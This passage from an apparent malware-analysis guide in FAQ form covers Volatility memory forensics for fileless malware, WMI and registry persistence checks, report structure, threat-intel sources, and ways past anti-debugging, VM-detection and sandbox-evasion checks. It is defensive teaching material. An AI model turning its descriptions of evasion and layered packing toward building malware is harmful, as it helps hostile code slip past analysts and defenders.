| Primary Goal | Loader | Banking trojan |
Automated tools: CAPA (FireEye), Malpedia, MWCP (Malware Config Parser)
11. How do I analyze fileless malware that exists only in memory?
Fileless malware analysis:
1. Memory Acquisition:
- Capture full system memory dump with FTK Imager, WinPmem
- Or process-specific dump if malware process identified
2. Volatility Analysis:
# Identify suspicious processes
volatility -f memory.dmp --profile=Win10x64 pslist
volatility -f memory.dmp --profile=Win10x64 pstree
# Look for process injection
volatility -f memory.dmp --profile=Win10x64 malfind
# Scan for command lines (PowerShell obfuscation)
volatility -f memory.dmp --profile=Win10x64 cmdline
# Extract injected code
volatility -f memory.dmp --profile=Win10x64 procdump -p <PID> -D ./
3. PowerShell/WMI Analysis:
- Check PowerShell command history
- Analyze ScriptBlock logging (Event ID 4104)
- WMI persistence:
wmic /namespace:\\\\root\\subscription PATH __EventFilter
4. Registry Analysis:
- Image File Execution Options (IFEO) hijacking
- COM object hijacking
- AppInit_DLLs, AppCertDLLs
5. Scheduled Tasks and Services:
- Enumerate all scheduled tasks for suspicious entries
- Check service DLL paths for UNC paths or odd locations
Detection: Enable PowerShell logging, Sysmon (Event ID 7 - Image Load, Event ID 10 - Process Access)
12. What should I include in a malware analysis report?
Report structure:
- Executive Summary: Malware family, threat level, business impact, action items (1 paragraph)
- Technical Summary: File details, capabilities, IOCs (defanged), detection/remediation
- Detailed Analysis: Static/dynamic findings, unpacking, reverse engineering, screenshots
- Threat Intelligence: Attribution, MITRE ATT&CK mapping, related campaigns
- Recommendations: Blocking IOCs, detection rules (YARA/Snort/Sigma), prevention measures
- Appendices: Full IOC list (CSV), signatures, STIX bundle, tool versions
Audience versions: Executive (1-2 pages), Technical (10-20 pages), SOC/IR (IOCs + rules)
13. How do I stay updated on emerging malware threats and techniques?
Key sources:
- Threat Feeds: CISA alerts, Microsoft Security Intelligence, AlienVault OTX
- Repositories: MalwareBazaar (abuse.ch), VirusBay, theZoo
- Blogs: Krebs on Security, Malwarebytes Labs, SentinelOne Labs, Check Point Research
- Social: Follow @malwrhunterteam, @VK_Intel, @pr0xylife, hashtags #malware #threatintel
- Conferences: Black Hat, DEF CON, REcon, Botconf
- Communities: r/Malware, MalwareTech Discord, MISP, local BSides
- Certifications: GREM, GCFA, eLearnSecurity eMAPT
14. What's the difference between obfuscation, packing, and encryption in malware?
- Obfuscation: Makes code hard to understand (variable renaming, control flow flattening)
- Packing: Compresses executable (UPX reduces 800 KB to 200 KB, entropy 7.0-8.0)
- Encryption: Encrypts payload/config (XOR, AES, RC4) requiring decryption key
Layered protection example: Original malware → AES encrypted → Custom packed → Obfuscated stub → Final sample (200 KB, entropy 7.9)
Analysis approach: Reverse the layers (deobfuscate → unpack → decrypt)
15. How do I handle samples that use anti-analysis techniques?
Techniques and bypasses:
- Debugger Detection (
IsDebuggerPresent): Patch checks, use ScyllaHide plugin - Timing Checks (RDTSC): NOP out checks, use hardware breakpoints
- VM Detection (VMware/VBox artifacts): Use bare metal or Pafish to patch checks
- Sandbox Evasion (sleep, mouse checks): Patch sleep, automate user simulation
- API Hooking Detection: Use kernel-mode debuggers, hardware breakpoints
- Code Integrity Checks: Patch integrity check or use hardware breakpoints
Strategy: Identify checks via static analysis → Patch in memory → Use stealthy tools (hardware debuggers)
Tools: ScyllaHide (anti-anti-debug), al-khaser (test techniques)
Conclusion
Malware analysis is both an art and a science, requiring technical expertise, analytical thinking, and continuous learning. The workflow presented here—from initial triage through threat intelligence sharing—provides a systematic approach to dissecting even sophisticated threats.
Key takeaways:
- Layered analysis is essential: Combine static, dynamic, and behavioral techniques
- Safety first: Proper isolation prevents disaster
- Automation accelerates triage: Use tools for rapid classification
- Manual RE reveals novel threats: Deep reverse engineering uncovers advanced malware
- Community collaboration amplifies impact: Sharing IOCs protects everyone
As malware continues to evolve with AI-assisted generation, cloud-native architectures, and advanced evasion, analysts must continuously expand their skillset. Start with foundational knowledge, practice on real samples, and engage with the security research community.
The tools and methodologies in this guide provide a solid foundation, but remember: the most valuable tool is your analytical mindset. Happy hunting, stay safe, and never stop learning.
Continue your journey:
- Practice with samples from MalwareBazaar
- Build your lab with REMnux and FlareVM
- Join threat intelligence communities (MISP, AlienVault OTX)
- Follow malware researchers on Twitter/Mastodon
- Consider formal training (SANS FOR610, Malware Unicorn workshops)
The fight against malware is collaborative. By mastering analysis techniques and sharing your findings, you contribute to the collective defense of our digital infrastructure.